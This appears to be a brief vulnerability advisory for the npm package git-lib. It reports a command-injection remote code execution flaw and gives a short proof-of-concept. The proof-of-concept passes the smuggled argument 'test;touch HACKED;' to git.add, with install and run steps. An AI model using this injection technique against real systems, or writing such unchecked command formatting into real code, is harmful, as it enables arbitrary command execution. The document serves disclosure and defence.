git-lib is an a library with different git commands for uses.
Affected versions of this package are vulnerable to Remote Code Execution (RCE). A user input is formatted inside a command that will be executed without any check.
// poc.js var git = require("git-lib"); git.add("test;touch HACKED;").then(function(){ /** successfully added **/ }).catch(function(err){ /** unsuccessful **/ });
HACKED
npm i git-lib # Install affected module git init # Avoid problems with *git* node poc.js # Run the PoC
git-lib